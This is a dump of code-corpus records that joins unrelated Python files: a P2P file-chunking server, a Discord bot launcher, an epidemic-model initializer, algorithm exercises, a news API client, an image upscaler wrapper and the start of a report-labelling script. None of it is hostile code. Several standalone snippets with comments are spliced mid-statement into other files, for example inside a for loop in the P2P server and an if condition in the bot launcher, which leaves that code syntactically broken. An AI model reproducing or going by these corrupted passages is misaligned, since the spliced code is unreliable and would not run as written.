0\r\n # ServerSocket = socket.socket()\r\n ServerSocket=socket.socket()\r\n peer_id = 0\r\n port = 0\r\n\r\n # peer configs\r\n FILE_MAX_SIZE = 1024 * 100\r\n read_buffer_size = 1024\r\n\r\n # chunk_id and chunk\r\n file_block_list = {}\r\n peerName = Constants.FILE_OWNER\r\n\r\n # Creates the FileOwner that distributes the file chunks to different peers.\r\n # _owner_port\r\n # _file_name\r\n\r\n def __init__(self, owner_port, file_name):\r\n # print(\"constructor\")\r\n if file_name != None and path.exists(file_name):\r\n self.__file_name = file_name\r\n\r\n self.__owner_port = int(owner_port)\r\n\r\n try:\r\n # host = socket.gethostname()\r\n host = \"localhost\"\r\n self.ServerSocket.bind((host, self.__owner_port))\r\n self.ServerSocket.listen(5)\r\n except:\r\n print(\"program exited\")\r\n sys.exit(1)\r\n\r\n # Init file chunk list\r\n self.__divideFileIntoChunks()\r\n\r\n # Initiates the file owner process\r\n\r\n def initiateOwner(self):\r\n #try:\r\n while True:\r\n self.thread_number+=1\r\n print(self.peerName + Constants.WAITING_PEER)\r\n con, addr = self.ServerSocket.accept()\r\n print(\"A new connection request has been accepted\")\r\n message_from_client = con.recv(1024).decode()\r\n con.send((\"124\").encode())\r\n print(\"message from client :: \" + message_from_client)\r\n if message_from_client.upper().startswith(Constants.CONFIG):\r\n split_string = message_from_client.split(\" \")\r\n id = int(split_string[1])\r\n peer_port = int(split_string[2])\r\n download_port = int(split_string[3])\r\n self.peer_id = id\r\n self.port = peer_port\r\n self.__createDB(id, peer_port, download_port)\r\n\r\n print(self.__file_name)\r\n op = OwnerProcess(self.file_block_list, self.__file_name, con, addr, self.port, self.thread_number, self.peer_id, self.port)\r\n start_new_thread(op.run,())\r\n\r\n # except:\r\n # print(\"An exception occured\")\r\n\r\n\r\n # creates Master database which stores different peers and their ports.\r\n # id peer id\r\n # peer_port peer port\r\n # download_port port of download neighbour\r\n def __createDB(self, id, peer_port, download_port):\r\n master_DB[peer_port] = id\r\n port_DB[id] = PortDB(peer_port, download_port)\r\n\r\n\r\n def _chunk_file(self, file, extension):\r\n current_chunk_size = 0\r\n current_chunk = 0\r\n print(Constants.BLOCK + str(current_chunk) + Constants.EQUALS + \"102400\" + Constants.BYTES)\r\n location = \"OwnerDir/\" + str(current_chunk)\r\n done_reading = False\r\n while not done_reading:\r\n bfr1=None\r\n with open(f'{location}{extension}.chk', 'ab') as chunk:\r\n while True:\r\n bfr = file.read(self.read_buffer_size)\r\n if bfr1==None:\r\n bfr1=bfr\r\n else:\r\n bfr1+=bfr\r\n if not bfr:\r\n done_reading = True\r\n self.file_block_list[current_chunk] = bfr1\r\n print(str(current_chunk) + \" : \", len(self.file_block_list[current_chunk]))\r\n break\r\n\r\n chunk.write(bfr)\r\n current_chunk_size += len(bfr)\r\n\r\n if current_chunk_size + self.read_buffer_size > self.FILE_MAX_SIZE:\r\n self.file_block_list[current_chunk] = bfr1\r\n print(str(current_chunk) + \" : \", len(self.file_block_list[current_chunk]))\r\n current_chunk += 1\r\n location = \"OwnerDir/\" + str(current_chunk)\r\n current_chunk_size = 0\r\n break\r\n\r\n # Divides the file into various chunks\r\n def __divideFileIntoChunks(self):\r\n try:\r\n sepDir = Constants.OWNER_DIR\r\n sepDir = os.path.join(\"D:\\Work\\ComputerNetwork\\P2P\\FileOwner/\" + sepDir)\r\n if not path.exists(sepDir):\r\n os.mkdir(sepDir)\r\n\r\n p = Path.cwd()\r\n file_to_split = None\r\n for 
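# The 100 KiB chunking done by _chunk_file nearby, reduced to its essence:
# yield fixed-size byte blocks from a file (a sketch only; the real method
# also writes .chk files into OwnerDir as it goes).
def iter_chunks(path, chunk_size=1024 * 100):
    with open(path, "rb") as f:
        while True:
            block = f.read(chunk_size)
            if not block:
                break
            yield block

# usage: blocks = {i: b for i, b in enumerate(iter_chunks("test.pdf"))}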
f in p.iterdir():\r\n if f.is_file() and f.name == 'test.pdf':\r\n file_to_split = f\r\n break\r\n\r\n if file_to_split:\r\n with open(file_to_split, 'rb') as file:\r\n self._chunk_file(file, file_to_split.suffix)\r\n\r\n except:\r\n print(\"Exception in divide file into chunks\")\r\n exit(1)\r\n\r\n\r\n # def __testConfig(self):\r\n\r\n\r\n\r\nif __name__ == \"__main__\":\r\n n=len(sys.argv)\r\n # print(n)\r\n owner_port = 0\r\n file_name=\"test.pdf\"\r\n if n==2:\r\n owner_port=sys.argv[1]\r\n print(\"\")\r\n print(\"Owner Port: \" + owner_port + \" File name: \" + file_name)\r\n f1 = FileOwner(owner_port, file_name)\r\n f1.initiateOwner()\r\n # f1.test()\r\n elif(n==1):\r\n print(\"Mention Port number\")\r\n else:\r\n print(\"Only one argument is needed, i.e., Port Number\")","sub_path":"FileOwner/FileOwner.py","file_name":"FileOwner.py","file_ext":"py","file_size_in_byte":12797,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"489536670","text":"from __future__ import print_function\n\nimport os\nimport gc\nimport sys\nimport time\nimport traceback\nimport subprocess\nimport importlib\n\nclass ShutdownBus():\n def __init__(self):\n self.restart = False\n self.shutdown = False\n\n def bot_shutdown(self):\n self.restart = False\n self.shutdown = True\n\n def bot_restart(self):\n self.restart = True\n self.shutdown = True\n\n def reset(self):\n self.restart = False\n self.shutdown = False\n\nclass GIT(object):\n @classmethod\n def works(cls):\n try:\n return bool(subprocess.check_output('git --version', shell=True))\n except:\n return False\n\n\nclass PIP(object):\n @classmethod\n def run(cls, command, check_output=False):\n if not cls.works():\n raise RuntimeError(\"Could not import pip.\")\n\n try:\n return PIP.run_python_m(*command.split(), check_output=check_output)\n except subprocess.CalledProcessError as e:\n return e.returncode\n except:\n traceback.print_exc()\n print(\"Error using -m method\")\n\n @classmethod\n def run_python_m(cls, *args, **kwargs):\n check_output = kwargs.pop('check_output', False)\n check = subprocess.check_output if check_output else subprocess.check_call\n return check([sys.executable, '-m', 'pip'] + list(args))\n\n @classmethod\n def run_pip_main(cls, *args, **kwargs):\n import pip\n\n args = list(args)\n check_output = kwargs.pop('check_output', False)\n\n if check_output:\n from io import StringIO\n\n out = StringIO()\n sys.stdout = out\n\n try:\n pip.main(args)\n except:\n traceback.print_exc()\n finally:\n sys.stdout = sys.__stdout__\n\n out.seek(0)\n pipdata = out.read()\n out.close()\n\n print(pipdata)\n return pipdata\n else:\n return pip.main(args)\n\n @classmethod\n def run_install(cls, cmd, quiet=False, check_output=False):\n return cls.run(\"install %s%s\" % ('-q ' if quiet else '', cmd), check_output)\n\n @classmethod\n def run_show(cls, cmd, check_output=False):\n return cls.run(\"show %s\" % cmd, check_output)\n\n @classmethod\n def works(cls):\n try:\n import pip\n return True\n except ImportError:\n return False\n\n @classmethod\n def get_module_version(cls, mod):\n try:\n out = cls.run_show(mod, check_output=True)\n\n if isinstance(out, bytes):\n out = out.decode()\n\n datas = out.replace('\\r\\n', '\\n').split('\\n')\n expectedversion = datas[3]\n\n if expectedversion.startswith('Version: '):\n return expectedversion.split()[1]\n else:\n return [x.split()[1] for x in datas if x.startswith(\"Version: \")][0]\n except:\n pass\n\n\ndef main():\n\n sstate = ShutdownBus()\n\n if not 
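# The core of PIP.run_python_m above: invoke pip through the current
# interpreter with subprocess so the right environment is targeted.
import subprocess
import sys

def pip_install(package):
    return subprocess.check_call(
        [sys.executable, "-m", "pip", "install", package]
    )

# pip_install("requests")  # uncomment to actually install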
sys.version_info >= (3, 5):\n print(\"[PB] Python 3.5+ is required. This version is %s\" % sys.version.split()[0])\n print(\"Attempting to locate python 3.5...\")\n\n pycom = None\n\n\n if sys.platform.startswith('win'):\n try:\n subprocess.check_output('py -3.5 -c \"exit()\"', shell=True)\n pycom = 'py -3.5'\n except:\n\n try:\n subprocess.check_output('python3 -c \"exit()\"', shell=True)\n pycom = 'python3'\n except:\n pass\n\n if pycom:\n print(\"\\nPython 3.5 found. Re-starting PlasmaBot using: \")\n print(\" %s run.py\\n\" % pycom)\n os.system('start cmd /k %s run.py' % pycom)\n sys.exit(0)\n\n else:\n try:\n pycom = subprocess.check_output(['which', 'python3.5']).strip().decode()\n except:\n pass\n\n if pycom:\n print(\"\\nPython 3.5 found. Re-starting PlasmaBot using: \")\n print(\" %s run.py\\n\" % pycom)\n\n os.execlp(pycom, pycom, 'run.py')\n\n print(\"Please run the bot using Python3.5\")\n input(\"Press ENTER to continue . . .\")\n\n return\n\n import asyncio\n\n tried_requirementstxt = False\n tryagain = True\n\n loops = 0\n max_wait_time = 60\n\n import plasmaBot\n\n while tryagain:\n\n try:\n importlib.reload(plasmaBot)\n\n m = plasmaBot.PlasmaBot(sstate)\n print(\"[PB] Connecting to Discord...\", end='', flush=True)\n m.run()\n\n except (KeyboardInterrupt, SystemExit):\n print(\"\\n[PB] Shutting Down...\\n\\nThanks for using PlasmaBot!\\n--------------------------------------------------------\")\n m.shutdown()\n break\n\n except SyntaxError:\n traceback.print_exc()\n break\n\n except ImportError as e:\n if not tried_requirementstxt:\n tried_requirementstxt = True\n\n # TODO: Better output\n print(e)\n print(\"[PB] Attempting to install PlasmaBot dependencies...\")\n\n err = PIP.run_install('--upgrade -r requirements.txt')\n\n if err:\n print(\"\\nYou should %s to install the PlasmaBot dependencies.\" %\n ['use sudo', 'run as admin'][sys.platform.startswith('win')])\n break\n else:\n print(\"\\nDependencies Installed\\n\")\n else:\n traceback.print_exc()\n print(\"[PB] Unknown ImportError, closing.\")\n break\n\n except Exception as e:\n if hasattr(e, '__module__') and e.__module__ == 'plasmaBot.exceptions':\n if e.__class__.__name__ == 'HelpfulError':\n print(e.message)\n break\n else:\n if (sstate.shutdown is True):\n if sstate.restart is True:\n print(\"\\n[PB] Restarting...\\n\\nThanks for using PlasmaBot!\\n\")\n loops = -1\n sstate.reset()\n\n if m:\n del m\n else:\n print(\"\\n[PB] Shutting Down...\\n\\nThanks for using PlasmaBot!\\n--------------------------------------------------------\")\n break\n else:\n traceback.print_exc()\n\n finally:\n asyncio.set_event_loop(asyncio.new_event_loop())\n loops += 1\n\n print(\"Cleaning up... 
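# The restart loop's linear back-off nearby, isolated: wait 2 s more per
# failed attempt, capped at max_wait_time. Note the original prints
# loops*2, which drifts from the real wait once the cap kicks in;
# printing sleeptime avoids that.
import time

def backoff_sleep(loops, max_wait_time=60):
    sleeptime = min(loops * 2, max_wait_time)
    if sleeptime:
        print(f"Restarting in {sleeptime} seconds...")
        time.sleep(sleeptime)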
\", end='')\n gc.collect()\n print(\"Done.\")\n\n sleeptime = min(loops * 2, max_wait_time)\n if sleeptime:\n print(\"Restarting in {} seconds...\".format(loops*2))\n time.sleep(sleeptime)\n\n\nif __name__ == '__main__':\n main()\n","sub_path":"run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":7033,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"498459530","text":"import numpy as np\nimport pickle\nimport os\nfrom datetime import datetime, timedelta\nimport pandas as pd\n# todo: this fxn is duplicated in io_support -- reorganize so it gets a single def that is easily imported where needed\n\nclass InitialModelState:\n\n def __init__(self, total_time, interval_per_day, n_age, n_risk, initial_i, metro_pop):\n\n self.total_time = total_time\n self.interval_per_day = interval_per_day\n self.n_age = n_age\n self.n_risk = n_risk\n self.initial_i = initial_i\n self.metro_pop = metro_pop\n self.start_day = None\n self.offset = None\n\n def initialize(self):\n\n if isinstance(self.initial_i, str):\n if os.path.exists(self.initial_i):\n return self.initialize_from_deterministic()\n else:\n raise ValueError('Initial state is provided as a string that does not map to a valid file path.')\n\n elif isinstance(self.initial_i, np.ndarray):\n return self.initialize_from_start()\n\n elif isinstance(self.initial_i, list):\n return self.initialize_from_start()\n\n else:\n print(type(self.initial_i))\n raise ValueError('Initial conditions provided are not supported.')\n\n def instantaneous_state(self, min_hosp=10):\n\n # todo: implement checks to make sure the deterministic solution read in is actually the one you want\n # todo: for example, is it the right city? the right params?\n # todo: this might require packaging the config with the outputs so a few things can be checked easily after loading this file\n with open(self.initial_i, 'rb') as xp:\n data = pickle.load(xp)\n\n if len(data.c_reduction.values) > 1:\n raise ValueError('Instantaneous states are currently only supported for deterministic runs with fixed contact reduction levels.')\n\n dataset = data.to_dataset('compartment')\n\n # todo: this syntax can replace compartment_stack() where resolution == 'point'\n hosp_slice = dataset['Iy'].sel({\n 'beta0': dataset['beta0'].values.item(),\n 'c_reduction': dataset['c_reduction'].values.item(),\n 'g_rate': 'high',\n 'reopen_trigger': dataset['reopen_trigger'].values.item(),\n 'close_trigger': dataset['close_trigger'].values.item()\n }).sum(dim=['age_group', 'risk_group']).to_dataframe().reset_index()\n\n # assume the first date's HH:MM:SS is always 00:00:00\n hosp_slice_daily = hosp_slice.iloc[::self.interval_per_day, :]\n\n # assumption: single peak in hospitalizations; deterministic sim starts at 1 infected person so the\n # beginning of the time series will always be below the threshold\n threshold_slice = hosp_slice_daily[hosp_slice_daily['Iy'] >= min_hosp]\n start_slice = threshold_slice['time'].min()\n self.offset = timedelta(hours = start_slice.hour,\n minutes = start_slice.minute,\n seconds = start_slice.second,\n microseconds= start_slice.microsecond)\n\n # we don't want to start mid-day because that would require a refactor how how the SEIR model handles dates\n # instead, drop day fraction to begin at zero hours of day \n self.start_day = datetime(start_slice.year, start_slice.month, start_slice.day)\n\n compartment_slices = {i: dataset[i].sel({\n 'beta0': dataset['beta0'].values.item(),\n 'c_reduction': 
dataset['c_reduction'].values.item(),\n            'g_rate': 'high',\n            'reopen_trigger': dataset['reopen_trigger'].values.item(),\n            'close_trigger': dataset['close_trigger'].values.item(),\n            'time': start_slice,\n            'replicate': 0 # possibly irrelevant for deterministic runs\n        }).values for i in data.compartment.values}\n\n        return compartment_slices\n\n    def initialize_empty(self):\n        \"\"\" Make an empty numpy array for each compartment, and return as a dictionary. \"\"\"\n\n        compt_s = np.zeros(shape=(self.total_time * self.interval_per_day, self.n_age, self.n_risk)) # (t,a,r)\n        compt_e, compt_ia, compt_iy, compt_e2compt_i = compt_s.copy(), compt_s.copy(), compt_s.copy(), compt_s.copy()\n        compt_ih, compt_r, compt_e2compt_iy, compt_d = compt_s.copy(), compt_s.copy(), compt_s.copy(), compt_s.copy()\n        compt_iy2compt_ih, compt_h2compt_d = compt_s.copy(), compt_s.copy()\n\n        return {'S': compt_s, 'E': compt_e, 'Ia': compt_ia, 'Iy': compt_iy, 'E2I': compt_e2compt_i, 'Ih': compt_ih,\n                'R': compt_r, 'E2Iy': compt_e2compt_iy, 'D': compt_d, 'Iy2Ih': compt_iy2compt_ih, 'H2D': compt_h2compt_d}\n\n    # todo: make a static method\n    def update_initial_cond(self, array, t0_value):\n        \"\"\" Update the initial condition of a compartment. \"\"\"\n\n        array[0] = t0_value\n\n        return array\n\n    def initialize_infected_only(self, empty):\n        \"\"\" Add infected compartment totals from the config and adjust metro pop accordingly. \"\"\"\n\n        empty['S'] = self.update_initial_cond(empty['S'], self.metro_pop - self.initial_i)\n        empty['Iy'] = self.update_initial_cond(empty['Iy'], self.initial_i)\n\n        return empty\n\n    def initialize_from_start(self):\n        \"\"\" Return a dictionary of compartments, where only infected susceptible compartment contains non-zero entries \"\"\"\n\n        # get empty arrays\n        initial_comp_dict = self.initialize_empty()\n\n        return self.initialize_infected_only(initial_comp_dict)\n\n    def initialize_from_deterministic(self):\n        \"\"\" Return a dictionary of compartments, each with initial conditions from a deterministic sim at time zero \"\"\"\n\n        # get empty arrays\n        initial_comp_dict = self.initialize_empty()\n\n        # get start conditions from deterministic model\n        deterministic_comp_dict = self.instantaneous_state()\n\n        # add deterministic start conditions to the empty arrays\n        for key, value in initial_comp_dict.items():\n            if key not in deterministic_comp_dict.keys():\n                # todo: move this error checking to param parser\n                raise ValueError('Initial condition for compartment {} missing from input'.format(key))\n            initial_cond = deterministic_comp_dict[key]\n            initial_comp_dict[key] = self.update_initial_cond(initial_comp_dict[key], initial_cond)\n\n        return initial_comp_dict","sub_path":"src/SEIRcity/get_initial_state.py","file_name":"get_initial_state.py","file_ext":"py","file_size_in_byte":6486,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"383681018","text":"# The first idea was to move two pointers at the same time and split the partition exactly in half, but that does not give a log() time complexity.\n\n# Solution: move only one pointer, and always compute the other pointer's position so that the partition stays split in half; this keeps the search logarithmic.\n# Taking the pointer range as twice the index value reduces the special-casing for odd/even element counts.\n# Time: O(log(min(M,N))), Space: O(1)\n\nfrom typing import List\n\nclass Solution:\n    def findMedianSortedArrays(self, nums1: List[int], nums2: List[int]) -> float:\n        n1, n2 = len(nums1), len(nums2)\n        if n1 < n2:\n            return self.findMedianSortedArrays(nums2, nums1)\n        l, r = 0, 2*n2\n        \n        while l <= r:\n            m2 = (l + r)//2\n            m1 = n1 + n2 - m2\n            \n            L1 = nums1[(m1-1)//2] if m1 > 0 else float('-inf')\n            R1 = 
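# Quick sanity check for the partition-based median routine here, against a
# brute-force merge on plain lists (the LeetCode class wrapper stripped away):
import statistics

def median_brute(a, b):
    return statistics.median(sorted(a + b))

assert median_brute([1, 3], [2]) == 2
assert median_brute([1, 2], [3, 4]) == 2.5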
nums1[m1//2] if m1 < 2*n1 else float('inf')\n            L2 = nums2[(m2-1)//2] if m2 > 0 else float('-inf')\n            R2 = nums2[m2//2] if m2 < 2*n2 else float('inf')\n            if R1 < L2:\n                r = m2 - 1\n            elif R2 < L1:\n                l = m2 + 1\n            else: # around L1 and L2, the left halves now hold exactly the elements smaller than the right partition\n                return (max(L1, L2) + min(R1, R2)) / 2\n        return -1 \n        \n","sub_path":"Leetcode/Median_of_Two_Sorted_Arrays.py","file_name":"Median_of_Two_Sorted_Arrays.py","file_ext":"py","file_size_in_byte":1454,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"466196315","text":"\nn = int(input())\n\nwhile(n):\n    n -= 1\n    inp = input().split()\n    seq_ch = []\n    rat = inp[1]\n\n    for b, i in enumerate(rat):\n        if i == '/':\n            index_slash = b\n\n    p = int(rat[:index_slash])\n    q = int(rat[index_slash + 1:])\n\n    while(p != 1 or q !=1):\n        if p > q:\n            seq_ch.insert(0,'right_child')\n            p = p - q\n        elif p < q:\n            seq_ch.insert(0,'left_child')\n            q = q - p\n\n    index = 1\n    while(len(seq_ch)):\n        if seq_ch[0] == 'left_child':\n            index = 2*index\n            seq_ch.pop(0)\n        elif seq_ch[0] =='right_child':\n            index = 2*index + 1\n            seq_ch.pop(0)\n    print(inp[0],index)\n\n\n\n","sub_path":"arationalsequence.py","file_name":"arationalsequence.py","file_ext":"py","file_size_in_byte":700,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"317069244","text":"import logging\nfrom functools import partial\n\nimport requests\n\nfrom newsapi.newsapi_auth import NewsApiAuth\nfrom newsapi.constants import COUNTRIES, CATEGORIES, LANGUAGES\n\n\nLOGGER = logging.getLogger()\n\n\nclass NewsApi(object):\n    \"\"\"Client for NewsApi.org.\n\n    An API Key is required, get a free one at https://newsapi.org.\n\n    Future\n    ======\n\n    If the API URL or the supported languages, countries, or categories\n    change, the defaults can be overridden. To add to these constants, import\n    them, append to the list, and pass them in when instancing NewsApi.\n    \"\"\"\n    def __init__(self, api_key: str, api_url='https://newsapi.org/v2/',\n                 timeout=30, countries=COUNTRIES,\n                 categories=CATEGORIES, languages=LANGUAGES) -> None:\n        self._url = api_url.rstrip('/')\n        self._get = partial(requests.get,\n                            auth=NewsApiAuth(api_key=api_key),\n                            timeout=timeout)\n        self._COUNTRIES = countries\n        self._CATEGORIES = categories\n        self._LANGUAGES = languages\n\n    def _validate_country(self, country: str) -> bool:\n        if not country:\n            return True\n        else:\n            assert country in self._COUNTRIES, \"Invalid Country specified.\"\n\n    def _validate_language(self, language: str) -> bool:\n        if not language:\n            return True\n        else:\n            assert language in self._LANGUAGES, \"Invalid Language specified.\"\n\n    def _validate_category(self, category: str) -> bool:\n        if not category:\n            return True\n        else:\n            assert category in self._CATEGORIES, \"Invalid Category specified.\"\n\n    def top_headlines(self, q: list=None, sources: list=None,\n                      language: str=None, country: str=None,\n                      category: str=None, page_size: int=None, page: int=None):\n        \"\"\"Returns live top and breaking headlines for a country, a specific\n        category in a country, a single source, or multiple sources.\n        Optional parameters:\n            q - return headlines with the specified keywords.\n            sources - return headlines from specific news sources. Some valid\n                values are 'bbc-news' and 'fox-news'; for more, use\n                NewsApi.sources().\n            language - 2-letter ISO-639-1 code of the language you want to get\n                headlines for. 
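# Hypothetical usage of the NewsApi client defined here; the key is a
# placeholder, and the fields unpacked ("status", "articles") follow the
# public NewsAPI response shape. Assumes the class above is importable.
api = NewsApi(api_key="YOUR_KEY_HERE")
top = api.top_headlines(q=["python"], language="en", page_size=5)
print(top.get("status"), len(top.get("articles", [])))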
Valid values are:\n\n                ar de en es fr he it nl no pt ru se\n                ud zh\n            country - The 2-letter ISO 3166-1 code of the country you want\n                to get headlines for.\n                Valid values are:\n\n                ae ar at au be bg br ca ch cn co\n                cu cz de eg fr gb gr hk hu id ie\n                il in it jp kr lt lv ma mx my ng\n                nl no nz ph pl pt ro rs ru sa se\n                sg si sk th tr tw ua us\n\n            category - The category you want to get headlines for. Valid values:\n                'business','entertainment','general','health','science',\n                'sports','technology'\n            page_size - The number of results to return per page (request).\n                20 is the default, 100 is the maximum.\n            page - Use this to page through the results if the total results found\n                is greater than the page size.\n        \"\"\"\n        self._validate_country(country)\n        self._validate_language(language)\n        self._validate_category(category)\n        # Define Payload\n        payload = {}\n        payload['q'] = ','.join(q) if q else None\n        payload['sources'] = ','.join(sources) if sources else None\n        payload['language'] = language\n        payload['country'] = country\n        payload['category'] = category\n        payload['pageSize'] = page_size\n        payload['page'] = page\n\n        # Send Request\n        LOGGER.debug(\"Params %s\", payload)\n        return self._get(self._url + '/top-headlines', params=payload).json()\n\n    def everything(self, q: list=None, sources: list=None, domains: list=None,\n                   from_parameter: str=None, to: str=None, language: str=None,\n                   sort_by: str=None, page: int=None,\n                   page_size: int=None) -> str:\n        \"\"\"Retrieve all headlines with optional filtering.\n        Optional parameters:\n\n        language - The 2-letter ISO-639-1 code of the language you want\n            to get headlines for.\n            Valid values:\n        'ar','de','en','es','fr','he','it','nl','no','pt','ru','se','ud','zh'\n\n        country - The 2-letter ISO 3166-1 code of the country you want to get\n            headlines from.\n            Valid values are:\n\n            ae ar at au be bg br ca ch cn co\n            cu cz de eg fr gb gr hk hu id ie\n            il in it jp kr lt lv ma mx my ng\n            nl no nz ph pl pt ro rs ru sa se\n            sg si sk th tr tw ua us\n\n        category - The category you want to get headlines for.\n            Valid values:\n            'business','entertainment','general','health','science','sports',\n            'technology'\n        \"\"\"\n        self._validate_language(language)\n\n        # Define Payload\n        payload = {}\n        payload['q'] = ','.join(q) if q else None\n        payload['sources'] = ','.join(sources) if sources else None\n        payload['domains'] = ','.join(domains) if domains else None\n        payload['from'] = from_parameter\n        payload['to'] = to\n        payload['language'] = ','.join(language) if language else None\n        payload['sortBy'] = sort_by\n        payload['page'] = page\n        payload['pageSize'] = page_size\n\n        # Send Request\n        LOGGER.debug(\"Params %s\", payload)\n        return self._get(self._url + '/everything', params=payload).json()\n\n    def sources(self, category: str=None, language: str=None,\n                country: str=None) -> str:\n        \"\"\"Retrieve list of source names optionally filtering by category and\n        language.\n        \"\"\"\n        self._validate_country(country)\n        self._validate_language(language)\n        self._validate_category(category)\n\n        # Define Payload\n        payload = {}\n        payload['category'] = category\n        payload['language'] = language\n        payload['country'] = country\n\n        # Send Request\n        LOGGER.debug(\"Params %s\", payload)\n        return self._get(self._url + '/sources', params=payload).json()\n","sub_path":"newsapi/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":6273,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"}
{"seq_id":"12422247","text":"#!/usr/bin/python3\n# -*- coding: 
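# The small-image test used by the upscaler's backupSmallImages below, in
# isolation; the context manager releases the file handle before any
# shutil.move. Thresholds are illustrative (the real ones come from
# common.macro).
from PIL import Image

def is_small(path, max_w=1920, max_h=1080):
    with Image.open(path) as img:
        return img.width < max_w and img.height < max_h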
utf-8 -*-\n\nfrom PIL import Image\nimport os\nimport sys\nimport time\nimport subprocess\nimport shutil\n\nfrom common import macro\nfrom common import utils\n\n\ndef backupSmallImages(path):\n bpath = os.path.join(path, macro.BACKUP_NAME)\n for fname in os.listdir(path):\n filename = os.path.join(path, fname)\n if not utils.isImage(filename):\n continue\n with Image.open(filename) as img:\n width = img.width\n height = img.height\n if width < macro.STAND_WIDTH and height < macro.STAND_HEIGHT:\n os.makedirs(bpath, exist_ok=True)\n shutil.move(filename, os.path.join(bpath, fname))\n\n\ndef filterUpscaledImages(path):\n bpath = os.path.join(path, macro.BACKUP_NAME)\n tpath = os.path.join(path, macro.TMP_NAME)\n if not os.path.exists(bpath) or not os.path.exists(tpath):\n return\n largeImages = os.listdir(tpath)\n for damagedImage in largeImages[-3:]:\n os.remove(os.path.join(tpath, damagedImage))\n applyLargeImages(path)\n largeImages = largeImages[:-3]\n\n for largeImage in largeImages:\n fname, _ = os.path.splitext(largeImage)\n os.remove(os.path.join(bpath, fname))\n\n\ndef applyLargeImages(path):\n tpath = os.path.join(path, macro.TMP_NAME)\n if not os.path.exists(tpath):\n return\n for fname in os.listdir(tpath):\n filename = os.path.join(tpath, fname)\n originalName, extend = os.path.splitext(fname)\n rawName, _ = os.path.splitext(originalName)\n os.rename(filename, os.path.join(path, rawName + extend))\n\n\ndef clear(path):\n applyLargeImages(path)\n bpath = os.path.join(path, macro.BACKUP_NAME)\n tpath = os.path.join(path, macro.TMP_NAME)\n utils.remove(bpath)\n utils.remove(tpath)\n\n\ndef upscaleImages(path):\n if not sys.platform.startswith('win'):\n return\n\n backupSmallImages(path)\n filterUpscaledImages(path)\n\n bpath = os.path.join(path, macro.BACKUP_NAME)\n tasks = os.listdir(bpath) if os.path.exists(bpath) else []\n if not tasks:\n clear(path)\n return\n\n tpath = os.path.join(path, macro.TMP_NAME)\n os.makedirs(tpath, exist_ok=True)\n\n waifu2xPath = os.path.join('tools', 'waifu2x-ncnn-vulkan')\n cmd = [\n os.path.join(waifu2xPath, 'waifu2x-ncnn-vulkan.exe'), '-t', '64', '-i',\n bpath, '-o', tpath\n ]\n p = subprocess.Popen(cmd, cwd=waifu2xPath)\n\n yield len(tasks)\n\n previsouNum = 0\n while previsouNum < len(tasks):\n time.sleep(5) # second\n finishNum = len(os.listdir(tpath))\n for index in range(previsouNum, finishNum):\n yield 'upscaling: ' + os.path.join(path, tasks[index])\n previsouNum = finishNum\n\n p.wait()\n\n clear(path)\n","sub_path":"tools/upscaler.py","file_name":"upscaler.py","file_ext":"py","file_size_in_byte":2760,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"0"} +{"seq_id":"139912517","text":"#main.py\n#Copyright (c) 2020 Rachel Lea Ballantyne Draelos\n\n#MIT License\n\n#Permission is hereby granted, free of charge, to any person obtaining a copy\n#of this software and associated documentation files (the \"Software\"), to deal\n#in the Software without restriction, including without limitation the rights\n#to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n#copies of the Software, and to permit persons to whom the Software is\n#furnished to do so, subject to the following conditions:\n\n#The above copyright notice and this permission notice shall be included in all\n#copies or substantial portions of the Software.\n\n#THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n#IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n#FITNESS FOR A 
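# The dated results-directory naming used by SARLE's generate_labels below,
# isolated into a helper (names are illustrative):
import datetime
import os

def results_dir_name(dataset, method, base="results"):
    stamp = datetime.datetime.today().strftime("%Y-%m-%d")
    return os.path.join(base, f"{stamp}_{dataset}_{method}")

print(results_dir_name("openi_cxr", "rules"))  # e.g. results/2020-01-01_openi_cxr_rules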
PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n#AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n#LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n#OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE\n#SOFTWARE\n\nimport os\nimport copy\nimport pickle\nimport datetime\nimport pandas as pd\nimport numpy as np\n\n#from sentence_classifier import ClassifySentences\nfrom sentence_rules import *\nimport term_search\nimport visualizations\n\ndef run_SARLE_Rules_demo():\n #SARLE-Rules\n #Apply rule-based methods. There are 3 options: 'duke_ct' applies the rules\n #developed for CT scans to the CXR data, just for demo purposes since the\n #CT data could not be made public. 'cxr_amb_neg' applies the rules\n #developed for chest x-rays that consider ambiguous findings negative.\n #'cxr_amb_pos' applies the rules developed for chest x-rays that consider\n #ambiguous findings positive.\n #Here we'll just apply all the rule based methods in sequence,\n #to demo all of them:\n for rules_to_use in ['duke_ct', 'cxr_amb_neg', 'cxr_amb_pos']:\n generate_labels(method='rules',rules_to_use=rules_to_use)\n\ndef run_SARLE_Hybrid_demo():\n #SARLE-Hybrid\n #Apply hybrid approach where the Fasttext classifier is used to distinguish\n #normal and abnormal sentences before the term search.\n #Note that Fasttext is only available on Linux.\n generate_labels(method='hybrid', rules_to_use='')\n \ndef generate_labels(method, rules_to_use):\n \"\"\"Generate labels for the radiology reports using the specified , either\n 'hybrid' for a Fasttext sentence classifier followed by the term search, or\n 'rules' for a rule-based phrase classifier followed by the term search\"\"\"\n assert method in ['hybrid','rules']\n assert rules_to_use in ['duke_ct', 'cxr_amb_neg', 'cxr_amb_pos','']\n if method=='hybrid': assert rules_to_use==''\n \n #Note that to run on CT data, dataset = 